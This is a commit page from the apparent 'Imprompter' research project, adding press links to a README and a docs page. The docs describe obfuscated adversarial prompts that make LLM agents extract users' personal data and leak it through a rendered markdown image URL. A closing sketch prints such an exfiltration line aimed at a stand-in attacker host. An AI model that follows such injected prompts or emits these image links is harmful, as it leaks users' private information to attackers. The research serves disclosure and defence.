
Commit

add press pointers
Reapor-Yurnero committed Oct 22, 2024
1 parent 1532705 commit 5a89db3
Showing 2 changed files with 3 additions and 2 deletions.
README.md: 2 changes (1 addition, 1 deletion)

@@ -6,7 +6,7 @@ A screencast showing how an attacker can exfiltrate the user's PII in real world

![img](docs/attack_screenshot_annotated.png)

-More video demos can be found on our [website](https://imprompter.ai).
+More video demos can be found on our [website](https://imprompter.ai). **Meanwhile, big thanks to Matt Burgess from WIRED and Simon Willison for writing cool stories ([WIRED](https://www.wired.com/story/ai-imprompter-malware-llm/), [Simon's Blog](https://simonwillison.net/2024/Oct/22/imprompter/)) covering this project!**

## Setup

docs/index.md: 3 changes (2 additions, 1 deletion)

@@ -5,11 +5,12 @@ hide:

<h1 style="margin-bottom: -1rem"></h1>


## Overview

Large Language Model (LLM) Agents are an emerging computing paradigm that blends generative machine learning with tools such as code interpreters, web browsing, email, and more generally, external resources. These agent-based systems represent an emerging shift in personal computing. We contribute to the security foundations of agent-based systems and surface a new class of automatically computed obfuscated adversarial prompt attacks that violate the confidentiality and integrity of user resources connected to an LLM agent. We show how prompt optimization techniques can find such prompts automatically given the weights of a model. We demonstrate that such attacks transfer to production-level agents. For example, we show an information exfiltration attack on Mistral's LeChat agent that analyzes a user's conversation, picks out personally identifiable information, and formats it into a valid markdown command that results in leaking that data to the attacker's server. This attack shows a nearly 80% success rate in an end-to-end evaluation. We conduct a range of experiments to characterize the efficacy of these attacks and find that they reliably work on emerging agent-based systems like Mistral's LeChat, ChatGLM, and Meta's Llama. These attacks are multimodal, and we show variants in the text-only and image domains.

-We present various demos and textual adversarial prompts on this page. For full details, please refer to our [paper](https://arxiv.org/abs/2410.14923){target="_blank"}.
+We present various demos and textual adversarial prompts on this page. For full details, please refer to our [paper](https://arxiv.org/abs/2410.14923){target="_blank"}. *Meanwhile, Matt Burgess from WIRED and Simon Willison have written some cool stories ([WIRED](https://www.wired.com/story/ai-imprompter-malware-llm/), [Simon's Blog](https://simonwillison.net/2024/Oct/22/imprompter/)) covering this project. Good resources for lighter reading if you are not in the mood for a 13-page paper!*

## Video Demo on Real Products

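The "valid markdown command" mentioned in the Overview above is the crux of the exfiltration: the adversarial prompt coerces the agent into emitting a markdown image whose URL carries the extracted PII, and the chat UI leaks the data the moment it renders that image. A minimal sketch of the payload shape follows; `attacker.example` and the `p=` query parameter are placeholders for illustration, not the actual endpoint or encoding used in the paper:

```markdown
![Source](https://attacker.example/track.png?p=John%20Doe%2Cjohn.doe%40example.com)
```

When the client renders this image, the browser issues a GET request for the URL, delivering the URL-encoded PII to the attacker's server with no further user action required.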
